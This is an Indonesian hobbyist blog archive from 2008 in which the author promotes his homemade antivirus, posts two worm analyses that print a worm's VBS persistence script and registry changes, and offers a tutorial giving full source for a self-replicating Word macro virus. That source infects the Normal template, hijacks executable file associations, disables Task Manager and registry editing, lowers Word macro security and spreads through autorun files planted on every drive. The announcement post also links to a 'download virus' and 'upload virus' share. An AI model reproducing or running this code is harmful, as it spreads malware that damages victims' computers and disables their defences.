MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Arsip untuk September, 2008

Morphost versi Revision siap Launching!

Ditulis oleh Morphic di/pada September 29, 2008

Ada sejuta pertanyaan mengapa Morphic harus melaunching Morphost versi terbarunya. Jawabannya hanya satu, yaitu Morphost yang terbaru ini lebih baik daripada Morphost yang terdahulu.

Ada banyak kesalahan dari Morphost AV2 August 2008. Untuk itu saya memperkecil semua kesalahan itu dan mengcompile ulang morphost, sehingga terciptalah Morphost AV2 August 2008 Revision!

Namanya hampir sama, bedanya ditambahkan nama “Revision” di belakangnya.

Kalau dilihat dengan mata Morphost AV2 August 2008 Revision dengan Morphost yang terdahulu hampir tidak ada bedanya.

Bedanya pada Morphost Revision tampak tulisan dibawah ini:

Ada beberapa kesalahan yang diperbaiki:

Kesalahan yang diperbaiki:

Kesalahan I : Morphost lama gagal dalam uji Test EICAR. (“EICAR-STANDARD-ANTIVIRUS-TEST-FILE!”)

Perbaikan I : Morphost versi Revision telah lolos dalam uji Test EICAR

Kesalahan II : Morphost hanya memperbaiki registry yang dirusak virus yang umum saja.

Perbaikan II : Kini MorphostLab telah menciptakan RegistryTweaker khusus virus-virus tertentu. Jadi registry yang dirusak dapat diperbaiki. Semua RegistryTweaker produksi MorphostLab dikenal dengan PlusFeature. Download semua software buatan Morphic & MorphostLab di: http://morphic.4shared.com (di dalam folder MorphicFreeware)

Kesalahan III : Morphost lama tidak dapat memperbaiki file dokumen word yang telah diinfeksi oleh virus.

Perbaikan III : MorphostLab sudah memproduksi tools khusus untuk mengembalikan file dokumen word yang telah diinfeksi virus.

Kesalahan IV : Morphost tidak menghapus registry startup dan registry services yang dibuat oleh virus.

Perbaikan IV : MorphostLab sudah memproduksi RegistryTweaker dan Vaksin-vaksin khusus untuk virus.

Kini metode heuristik pada Morphost Revision sudah semakin digalakkan. Saya sudah membuat antivirus ini sejak kelas satu sma (dua tahun lalu). Jadi saya tahu betul ada banyak perkembangan pada Morphost Revision ini.

Semua link untuk mendownload sama!!!!

Dapatkan Morphost Antivirus hari ini juga!!!

Download Morphost http://morphic.4shared.com

Download database Morphost http://morphic.4shared.com

Download tutorial Morphost http://morphic.4shared.com

Download Plus Feature Morphost http://morphic.4shared.com

Download tools Morphostlab http://morphic.4shared.com

Download virus http://morphic.4shared.com

Download tools anak negeri http://morphic.4shared.com

Upload virus http://morphic.4shared.com

Upload Virus buatan http://morphic.4shared.com

Upload software buatan sendiri http://morphic.4shared.com

Semuanya upload dan download aja dari http://morphic.4shared.com

By: Morphic

Myfriendster : http://www.friendster.com/morphic

Mail me: karta_morphic@yahoo.co.id

Thanks to:

-Aat Shadewa

-Anharku

-Kholis

-Poet

-and others

Ditulis dalam Uncategorized | 3 Komentar »

Analisa Global.Worm by Morphic

Ditulis oleh Morphic di/pada September 29, 2008

Ini dia Global.Worm. makan neh hasil analisa.

(BACA: Hasil analisa berikut tidak sepenuhnya benar, mungkin saja saya salah menganalisa!)

Hasil Analisa

Nama Malware : Global.Worm [Morphost], virus.Win32.Sality.z [KasperskyLab], W32.Silly.FDC [Symantec], W32/Sality.ag [McAfee]

Ukuran : 286,720 bytes

Pengirim Virus : ditemukan oleh metode Heuristik Morphost

Icon : icon folder

CRC32 : 55BC6B01 (berdasarkan file yang ditemukan)

MD5 : 67CE8B53CBF5A1D3BF4269748F82ACCA (berdasarkan file yang ditemukan)

Dibuat dengan : Visual Basic

Direktori projek saat pembuatan virus ini adalah:

C:\Documents and Settings\TASDA.TASDA-B20F43BAE\Desktop07\Project1.vbp

Ditemukan script vbs seperti berikut:

dim fs,rg

set fs = createobject(“scripting.filesystemobject”)

set rg = createobject(“wscript.shell”)

on error resume next

rg.regwrite “HKCR\.vbs\”, “VBSFile”

rg.regwrite “HKCU\Control Panel\Desktop\SCRNSAVE.EXE”, ” C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com”

rg.regwrite “HKCU\Control Panel\Desktop\ScreenSaveTimeOut”, “30″

rg.regwrite “HKCR\MSCFile\Shell\Open\Command\”, “C:\WINDOWS\pchealth\Global.exe”

rg.regwrite “HKCR\regfile\Shell\Open\Command\”, “C:\WINDOWS\pchealth\Global.exe”

rg.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”, “C:\WINDOWS\system32\dllcache\Default.exe”

rg.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”, “C:\WINDOWS\system32\dllcache\Default.exe”

rg.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”, “C:\WINDOWS\system\KEYBOARD.exe”

rg.regwrite “HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\”, “C:\WINDOWS\Fonts\Fonts.exe”

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\DisplayName”,”Local Group Policy”

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\FileSysPath”,”"

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPO-ID”,”LocalGPO”

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPOName”,”Local Group Policy”

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\SOM-ID”,”Local”

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Parameters”,”"

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Script”,”C:\WINDOWS\Cursors\Boom.vbs”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\DisplayName”, “Local Group Policy”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\FileSysPath”, “”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPO-ID”, “LocalGPO”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPOName”, “Local Group Policy”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\SOM-ID”, “Local”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Parameters”, “”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Script”, “C:\WINDOWS\Cursors\Boom.vbs”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\DisplayName”, “Local Group Policy”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\FileSysPath”, “”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPO-ID”, “LocalGPO”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPOName”, “Local Group Policy”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\SOM-ID”, “Local”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Parameters”, “”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Script”, “C:\WINDOWS\Cursors\Boom.vbs”

If Not fs.fileexists(“C:\WINDOWS\Fonts\Fonts.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\WINDOWS\Fonts\Fonts.exe”)

If Not fs.fileexists(“C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com”)

If Not fs.fileexists(“C:\WINDOWS\pchealth\Global.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\WINDOWS\pchealth\Global.exe”)

If Not fs.fileexists(“C:\WINDOWS\system\KEYBOARD.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\WINDOWS\system\KEYBOARD.exe”)

If Not fs.fileexists(“C:\WINDOWS\system32\dllcache\Default.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\WINDOWS\system32\dllcache\Default.exe”)

If Not fs.fileexists(“C:\windows\system32\drivers\drivers.cab.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\windows\system32\drivers\drivers.cab.exe “)

If Not fs.fileexists(“C:\windows\media\rndll32.pif “) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\windows\media\rndll32.pif”)

If Not fs.fileexists(“C:\windows\fonts\tskmgr.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\windows\fonts\tskmgr.exe”)

Membuat File di:

“C:\windows\system32\dllchace\autorun.inf”

“C;\windows\Cursors\Boom.vbs”

Dan lain-lain

Membuat registry key berikut:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile]

NeverShowExt = “1″

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]

NeverShowExt = “1″

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = “%FontsDir%\Fonts.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]

DisableStatusMessages = 0×00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

sys = “%FontsDir%\Fonts.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

(Default) = “%Windir%\system\KEYBOARD.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = “%System%\dllcache\Default.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe]

Debugger = “%System%\drivers\drivers.cab.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe]

Debugger = “%System%\drivers\drivers.cab.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe]

Debugger = “%System%\drivers\drivers.cab.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe]

Debugger = “%FontsDir%\fonts.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe]

Debugger = “%FontsDir%\Fonts.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]

Debugger = “%Windir%\Media\rndll32.pif”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]

* Debugger = “%Windir%\pchealth\helpctr\binaries\HelpHost.com”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]

Debugger = “%FontsDir%\tskmgr.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

Parameters = “”

Script = “%Windir%\Cursors\Boom.vbs”

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

DisplayName = “Local Group Policy”

FileSysPath = “”

GPO-ID = “LocalGPO”

GPOName = “Local Group Policy”

SOM-ID = “Local”

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

Parameters = “”

Script = “%Windir%\Cursors\Boom.vbs”

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

DisplayName = “Local Group Policy”

FileSysPath = “”

GPO-ID = “LocalGPO”

GPOName = “Local Group Policy”

SOM-ID = “Local”

[HKEY_CURRENT_USER\Control Panel\Desktop]

SCRNSAVE.EXE = “%Windir%\pchealth\helpctr\binaries\HelpHost.com”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = “%System%\dllcache\Default.exe”

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

Parameters = “”

Script = “%Windir%\Cursors\Boom.vbs”

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

DisplayName = “Local Group Policy”

FileSysPath = “”

GPO-ID = “LocalGPO”

GPOName = “Local Group Policy”

SOM-ID = “Local”

Menghapus registry:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = “%SystemRoot%\system32\mmc.exe “%1″ %*”

Memodifikasi registry value:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command]

(Default) = “%Windir%\pchealth\Global.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]

ValueName = “ShowSuperHiden”

[HKEY_CURRENT_USER\Control Panel\Desktop]

AutoEndTasks = “1″

ScreenSaveTimeOut = “30″

=============================================================================

Untuk worm ini sudah bisa dibereskan dengan Morphost Antivirus. [NB: Sekarang Morphost udah diperbaharui, jadi silakan download Morphost yang baru.]

Signature worm ini sudah saya masukkan ke dalam database Morphost. Jadi kamu sudah bisa menggunakan Morphost untuk menscan Komputermu dari Global.Worm.

Kalo Global.Worm belum juga pergi dari komputermu. Lakukan langkah berikut:

-Pilih tab settings

-Pilih options ”let users make their database themselves” pada frames “database”

-Lalu masukkan satu saja sampel Global.Worm

-Dan langsung scan!

By: Morphic

http://www.friendster.com/morphic (friendster)

http://morphians.wordpress.com (my blog)

karta_morphic@yahoo.co.id (my email)

http://morphic.4shared.com (download Morphost and Morphost database here!)

and don’t forget to join with MorphostLab (FriendsterGroup)

My thanks go to Anharku, MorphostLab, anak-anak Permata Setia Budi, anak-anak Smansa Medan, anak-anak kelas XII IPA 10 Smansa Medan, and others.

Ditulis dalam Uncategorized | Leave a Comment »

Analisis Word.Worm alias W32.Worm by Morphic

Ditulis oleh Morphic di/pada September 16, 2008

Kali ini virus yang aku analisa adalah virus Word.Worm alias W32.Word. Kurang lebih inilah hasil analisanya.

(BACA: Hasil analisa berikut tidak sepenuhnya benar, mungkin saja saya salah menganalisa!)

Hasil Analisa

Nama Malware : Word.Worm [Morphost], Mal/SillyFDC-A [Sophos]

Ukuran : 742,400 bytes

Pengirim Virus : Kholis

Icon : Ms.Word.

CRC32 : E84366B4 (berdasarkan file yang dikirim)

MD5 : 0D57C603D11E5E5CFE3B8F1C502779D7 (berdasarkan file yang dikirim)

Dibuat dengan : Visual Basic

Company Name : 100 KB

Internal Name : Readme

Packer : UPX 0.89.6 – 1.02 / 1.05 – 1.24 -> Markus & Laszlo

Library yang berhubungan dengan virus ini antara lain:

- A6.dll (lokasi: ?)

- Kernell32.dll (lokasi: C:\windows\system32)

- Msvbvm60.dll (lokasi: C:\windows\system32)

- 6.OLB (lokasi: ?)

(mungkin untuk yang diatas ini, Kholis gak sadar ya….. Tapi begitulah, hasil analisa kami mengatakan demikian)

Virus ini akan memunculkan kotak dialog seperti dibawah ini:

File-file yang diciptakan oleh virus ini antara lain:

- c:\67Readme.exe

Ukuran: 742,400 bytes

MD5: 0D57C603D11E5E5CFE3B8F1C502779D7

- c:\windows\Readme.exe

Ukuran: 742,400 bytes

MD5: 0D57C603D11E5E5CFE3B8F1C502779D7

- c:\windows\system32\Casper.bmp

Ukuran: 1,896,174 bytes

MD5: E28DA4CA511E7497E3AF433DAC073ED4

- c:\windows\system32\Prisa.bmp

Ukuran: 1,713,534 bytes

MD5: 09ED82E8FEEE1E5F292844F8FE1BFFE6

- c:\windows\system32\Ratatouille.bmp

Ukuran: 1,570,014 bytes

MD5: 6007EC7CFD76E0EA719024622CB989D8

Tapi untuk sejauh ini, kami masih belum bisa menganalisis registry yang dirusak. Ada kemungkinan bahwa virus ini tidak memodifikasi registry.

=============================================================================

Kalau ada penyerangan lainnya silakan beritahu saya.

Signature worm ini sudah saya masukkan ke dalam database Morphost. Jadi kamu sudah bisa menggunakan Morphost untuk menscan Komputermu dari Word.Worm alias W32.Worm

Kalo Word.Worm belum juga pergi dari komputermu. Lakukan langkah berikut:

-Pilih tab settings

-Pilih options ”let users make their database themselves” pada frames “database”

-Lalu masukkan satu saja sampel Word.Worm misalnya yang ada di ”c:\windows\Readme.exe”

-Dan langsung scan!

By: Morphic

http://www.morphic.co.nr (Comment me here)

http://www.friendster.com/morphic (friendster)

http://morphians.wordpress.com (my blog)

karta_morphic@yahoo.co.id (my email)

http://morphic.4shared.com (download Morphost and Morphost database here!)

and don’t forget to join with MorphostLab (FriendsterGroup)

My thanks go to Mas Aat Shadewa, Kholis, Virologi, and Others.

Ditulis dalam Uncategorized | Leave a Comment »

Tutorial Membuat Virus Macro

Ditulis oleh Morphic di/pada September 11, 2008

(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)

Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.

Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).

Pasti banyak bertanya kenapa kali ini Morphic membahas tentang cara membuat virus? Biasanya kan Morphic lebih sering membahas analisis virus atau antivirusnya itu….

Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.

Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..


Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.

CARA MEMBUAT VIRUS MACRO

  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor

    • Akan muncul gambar di bawah

      Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.

      Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???

      Tenang, aku dah siapkan kok sourcenya. Makan neh source code!

      ‘This is my code’s virus

      ‘Fuck Gates. Your software has small weakness. Watch it!

      ‘Macro Viruses

      ‘[Macroid]

      ‘Hanya untuk pembelajaran

      Private Sub Document_Close()

      Dim AD, NT As Object

      Dim isi As String

      Set AD = ActiveDocument.VBProject.VBComponents.Item(1)

      Set NT = NormalTemplate.VBProject.VBComponents.Item(1)

      If AD.Name <> “Macroid” Then

      AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines

      AD.Name = “Macroid”

      isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)

      AD.CodeModule.AddFromString isi

      ActiveDocument.Save

      End If

      If NT.Name <> “Macroid” Then

      NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines

      NT.Name = “Macroid”

      isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)

      NT.CodeModule.AddFromString isi

      NormalTemplate.Save

      End If

      If InStr(ActiveDocument.Content, “Macroid”) = 0 Then

      ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″

      End If

      On Error Resume Next

      Dim b As Object

      Set b = CreateObject(“Wscript.Shell”)

      b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”

      b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”

      b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”

      b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”

      b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″

      b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”

      b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”

      b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”

      b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      On Error Resume Next

      Dim rog As Integer

      Dim atr, vbs, Tipu(10), Trik(10) As String

      For a = 66 To 90

      partisi = Chr$(a)

      vbs = partisi & “:\auto.vbs”

      atr = partisi & “:\autorun.inf”

      Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”

      Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”

      Tipu(3) = partisi & “:\Titip File sebentar.doc”

      Tipu(4) = partisi & “:\jangan di baca.doc”

      Tipu(5) = partisi & “:\buku harian.doc”

      Tipu(6) = partisi & “:\cerita hangat.doc”

      Tipu(7) = partisi & “:\Punya Baim.doc”

      Tipu(8) = partisi & “:\Teka-teki yang baru.doc”

      Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”

      Tipu(10) = partisi & “:\Trik Sulap.doc”

      If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then

      Randomize

      rog = Int(10 * Rnd) + 1

      Open Tipu(rog) For Output As #1

      Print #1, “”

      Close #1

      End If

      Trik(1) = partisi & “:\Novel J.K.Rowling.doc”

      Trik(2) = partisi & “:\cerita cinta.doc”

      Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”

      Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”

      Trik(5) = partisi & “:\Kumpulan Cheat game.doc”

      Trik(6) = partisi & “:\Cheat game RF.doc”

      Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”

      Trik(8) = partisi & “:\Goosebumps.doc”

      Trik(9) = partisi & “:\FearStreet.doc”

      Trik(10) = partisi & “:\R.L.Stine.doc”

      If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then

      Randomize

      rogi = Int(10 * Rnd) + 1

      Open Trik(rogi) For Output As #1

      Print #1, “”

      Close #1

      End If

      Open atr For Output As #1

      Print #1, “[Autorun]“

      Print #1, “shell\Open\command=wscript.exe auto.vbs”

      Close #1

      SetAttr atr, vbHidden + vbSystem

      Open vbs For Output As #1

      Print #1, “dim a”

      Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Close #1

      SetAttr vbs, vbHidden + vbSystem

      Next a

      If Dir(Environ$(“windir”) & “\Macroid.doc”) = “” Then

      Dim isicrita As String

      isicrita = “[Macroid] by Morphic” & vbCrLf & “Copyright(c) Medan Juli-2008″ & vbCrLf & vbCrLf & _

      Chr(34) & “Ms.Word is a thing that can be used as a power to break everything…. ” & Chr(34) & vbCrLf & “(Morphic)”

      Open Environ$(“windir”) & “\Macroid.doc” For Output As #1

      Print #1, isicrita

      Close #1

      End If

      If Dir(Environ$(“windir”) & “\avmc.vbs”) = “” Then

      Open Environ$(“windir”) & “\avmc.vbs” For Output As #1

      Print #1, “set fs = createobject(” & Chr(34) & “Scripting.FileSystemObject” & Chr(34) & “)”

      Print #1, “for each FD in fs.drives”

      Print #1, “if (FD.Drivetype = 1) and FD.Path <> ” & Chr(34) & “A:” & Chr(34) & ” then”

      Print #1, “set tf = fs.CreateTextFile(FD.Path” & Chr(38) & Chr(34) & “\Jangan di baca.doc” & Chr(34) & “)”

      Print #1, “end if”

      Print #1, “Next”

      Close #1

      End If

      ActiveDocument.Save

      NormalTemplate.Save

      End Sub

      Private Sub Document_Open()

      CommandBars(“Tools”).Controls(“Macro”).Visible = False

      CommandBars(“Tools”).Controls(“Macro”).Enabled = False

      CommandBars(“Tools”).Controls(“Customize…”).Visible = False

      CommandBars(“Tools”).Controls(“Options…”).Visible = False

      Dim AD, NT As Object

      Dim isi As String

      Set AD = ActiveDocument.VBProject.VBComponents.Item(1)

      Set NT = NormalTemplate.VBProject.VBComponents.Item(1)

      If AD.Name <> “Macroid” Then

      AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines

      AD.Name = “Macroid”

      isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)

      AD.CodeModule.AddFromString isi

      ActiveDocument.Save

      End If

      If NT.Name <> “Macroid” Then

      NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines

      NT.Name = “Macroid”

      isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)

      NT.CodeModule.AddFromString isi

      NormalTemplate.Save

      End If

      If InStr(ActiveDocument.Content, “Macroid”) = 0 Then

      ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″

      End If

      On Error Resume Next

      Dim b As Object

      Set b = CreateObject(“Wscript.Shell”)

      b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”

      b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”

      b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”

      b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”

      b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″

